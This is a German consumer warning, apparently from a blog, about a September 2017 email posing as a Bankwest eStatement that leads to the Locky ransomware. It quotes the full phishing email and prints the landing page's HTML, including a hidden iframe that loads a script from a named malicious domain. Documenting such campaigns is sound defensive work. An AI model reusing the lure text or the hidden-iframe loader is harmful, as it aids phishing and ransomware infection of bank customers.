Achtung: Verschlüsselungs- und Erpressungstrojaner ‚Locky‘! Bankwest – You have a new eStatement von Bankwest ([email protected])

Am Dienstag, den 12. September 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Was nach Phishing aussieht, ist aber eine E-Mail, mit deren Hilfe Sie sich die Ransomware „Locky“ (Verschlüsselungs- und Epressungstrojaner) einfangen würden! Klicken Sie deswegen nicht auf die Links!

Betreff: Bankwest – You have a new eStatement
Absender: Bankwest ([email protected])

bankwest               facebook twitter linkedin

You have a new eStatement

Dear CUSTOMER

A new eStatement is now available for viewing.

Simply login to the Bankwest App or Bankwest Online Banking to view, download or print your statement.

Did you know?
Our highly rated Bankwest App features Bankwest Easy Alerts, notifying you of important account activity and allowing you to set up payment reminders. Visit our website for more information on Bankwest Easy Alerts and the Bankwest App as some device limitations may apply.

Note: You should never click a link in an email to go to Bankwest’s site and log in. The link may not be genuine and you might be disclosing confidential access details to a third party. This email is automatically generated; please do not reply as our system will not generate a response. For telephone queries regarding Bankwest Online Banking please contact 1300 440 749.

This email has been authorised by Bankwest, a division of Commonwealth Bank of Australia ABN 48 123 123 124 AFSL / Australian credit licence 234945, Bankwest Place, 300 Murray Street, Perth, WA 6000. If you believe you should not have received this email, please contact Bankwest on 13 17 19 immediately.

Achtung: Es handelt sich um eine betrügerische E-Mail! Die E-Mail stammt nicht von der Bankwest! Klicken Sie nicht auf den Link!

Die Bankwest hat Info-Seiten zum Thema „Sicherheit“. Leiten Sie betrügerische E-Mails im Namen der Bankwest an [email protected] weiter.

Der Link in der E-Mail verweist nicht auf ein Adobe Acrobat Reader – Dokument, sondern auf die Adresse bellevuecommunityband.org/statement.html. Diese würde folgende Meldung anzeigen:

Please wait while we prepare your eStatement for download…

Ein iFrame in der Seite würde für den Download eines JavaScript von wittinhohemmo.net/statement.php sorgen.

<div style=“background:#eee;border:1px solid #ccc;padding:5px 10px;“>Please wait while we prepare your eStatement for download…</div>
<iframe src=“http://wittinhohemmo.net/statement.php“ style=“display: none;“>
</iframe>

Von der gleichen Domain wurde bereits am Vortag die Ransomware „Locky“ (Verschlüsselungs- und Erpressungstrojaner) geladen:

Locky Ransomware: E-Mail ohne Betreff von Stephanie De Nassau ([email protected])

Locky Ransomware: Email Invoice Requested von Lois Curhbertson ([email protected])

 

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.